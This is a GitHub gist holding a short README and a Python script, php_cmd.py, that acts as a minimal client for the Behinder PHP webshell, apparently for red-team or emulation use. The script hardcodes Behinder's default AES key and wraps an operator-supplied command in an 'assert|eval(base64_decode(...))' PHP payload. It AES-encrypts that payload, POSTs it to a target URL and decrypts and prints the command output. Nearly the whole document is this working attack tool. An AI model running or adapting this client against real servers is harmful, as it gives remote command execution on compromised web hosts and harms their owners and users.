Last active
March 17, 2022 18:09
-
-
Save 2XXE-SRA/bcb0461d9cff307f2edd7ae9029522d5 to your computer and use it in GitHub Desktop.
Behinder webshell clients
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Behinder Webshell Clients | |
| ## php_cmd.py | |
| Minimal client for Behinder PHP webshell (shell.php). Requires Cmd.php from the official client jar. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # pip install pycrypto requests | |
| from Crypto.Cipher import AES | |
| import base64 | |
| import re | |
| import pathlib | |
| import requests | |
| import json | |
| import sys | |
| import argparse | |
| DEFAULT_KEY = 'e45e329feb5d925ba3f549b17b4b3dde'[0:16] # md5 of rebeyond | |
| class AesCbc: | |
| # crypto source (few minor edits): https://gist.github.com/nantsou/dcbddefd8a307dbac49568e036f9357d | |
| def __init__(self, key=None): | |
| self.iv = 16*'\x00' | |
| self.key = key or DEFAULT_KEY | |
| self.mode = AES.MODE_CBC | |
| self.size = AES.block_size | |
| self.pad = lambda s: s + (self.size - len(s) % self.size) * chr(self.size - len(s) % self.size) | |
| def encrypt(self, content): | |
| cryptor = AES.new(self.key, self.mode, self.iv) | |
| encrypted = cryptor.encrypt(self.pad(content)) | |
| return base64.b64encode(encrypted) | |
| def decrypt(self, content): | |
| cryptor = AES.new(self.key, self.mode, self.iv) | |
| content += (len(content) % 4) * '=' | |
| content = base64.urlsafe_b64decode(content) | |
| decrypted = cryptor.decrypt(content) | |
| try: | |
| return re.compile('[\\x00-\\x08\\x0b-\\x0c\\x0e-\\x1f\n\r\t]').sub('', decrypted.decode()) | |
| except Exception: | |
| raise ValueError("inputted value can not be decrypted.") | |
| def b64str(instr): | |
| return base64.b64encode(instr.encode()).decode() | |
| if __name__ == "__main__": | |
| parser = argparse.ArgumentParser() | |
| parser.add_argument("-u", "--url", dest="url", type=str) | |
| parser.add_argument("-c", "--cmd", dest="cmd", type=str) | |
| parser.add_argument("-p", "--path", dest="path", type=str, default="/") | |
| args = parser.parse_args() | |
| aes = AesCbc() | |
| cmd_func = pathlib.Path("<path to Cmd.php>").read_text() | |
| payload = cmd_func + \ | |
| f"""$cmd="{b64str(args.cmd)}"; | |
| $cmd=base64_decode($cmd); | |
| $path="{b64str(args.path)}"; | |
| $path=base64_decode($path); | |
| main($cmd,$path); | |
| """ | |
| payload = b64str(payload) | |
| payload = f"assert|eval(base64_decode('{payload}'));" | |
| payload = aes.encrypt(payload).decode() | |
| r = requests.post(args.url, data=payload) | |
| out_dict = json.loads(aes.decrypt(r.text)) # keys = msg (output) and status (pass/fail) | |
| print(base64.b64decode(out_dict["msg"]).decode()) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment